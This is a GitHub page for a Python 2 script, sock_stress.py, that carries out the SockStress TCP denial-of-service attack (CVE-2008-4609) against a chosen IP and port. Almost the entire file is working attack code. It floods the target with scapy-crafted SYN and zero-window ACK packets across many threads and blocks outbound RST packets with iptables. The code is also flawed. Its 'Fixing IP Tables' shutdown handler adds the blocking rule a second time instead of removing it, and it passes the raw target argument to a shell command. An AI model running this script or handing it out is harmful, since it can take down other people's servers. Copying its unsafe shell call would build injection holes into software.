forked from pan0pt1c0n/Python-SockStress
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsock_stress.py
executable file
·67 lines (57 loc) · 2.22 KB
/
sock_stress.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python
# Exploit Title: SockStress DoS
# Date: July 4, 2014
# Exploit Author: Justin Hutchens
# LinkedIn: www.linkedin.com/in/justinhutchens
# Twitter: @pan0pt1c0n
# Tested on: Kali Linux x64
# CVE : CVE-2008-4609
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from time import sleep
import thread
import os
import signal
import sys
print "\n*******************************************************"
print "** Python Sock Stress DoS **"
print "** by Pan0pt1c0n (Justin Hutchens) **"
print "** BREAK ALL THE SERVERS!!! **"
print "*******************************************************\n\n"
if len(sys.argv) != 4:
print "Usage - ./sock_stress.py [Target-IP] [Port Number] [Threads]"
print "Example - ./sock_stress.py 10.0.0.5 21 20"
print "Example will perform a 20x multi-threaded sock-stress DoS attack "
print "against the FTP (port 21) service on 10.0.0.5"
print "\n***NOTE***"
print "Make sure you target a port that responds when a connection is made"
sys.exit()
target = str(sys.argv[1])
dstport = int(sys.argv[2])
threads = int(sys.argv[3])
## This is where the magic happens
def sockstress(target,dstport):
while 0 == 0:
try:
x = random.randint(0,65535)
response = sr1(IP(dst=target)/TCP(sport=x,dport=dstport,flags='S'),timeout=1,verbose=0)
send(IP(dst=target)/TCP(dport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq + 1))/'\x00\x00',verbose=0)
except:
pass
## Graceful shutdown allows IP Table Repair
def graceful_shutdown(signal, frame):
print '\nYou pressed Ctrl+C!'
print 'Fixing IP Tables'
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
sys.exit()
## Creates IPTables Rule to Prevent Outbound RST Packet to Allow Scapy TCP Connections
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
signal.signal(signal.SIGINT, graceful_shutdown)
## Spin up multiple threads to launch the attack
print "The onslaught has begun...use Ctrl+C to stop the attack"
for x in range(0,threads):
thread.start_new_thread(sockstress, (target,dstport))
## Make it go FOREVER (...or at least until Ctrl+C)
while 0 == 0:
sleep(1)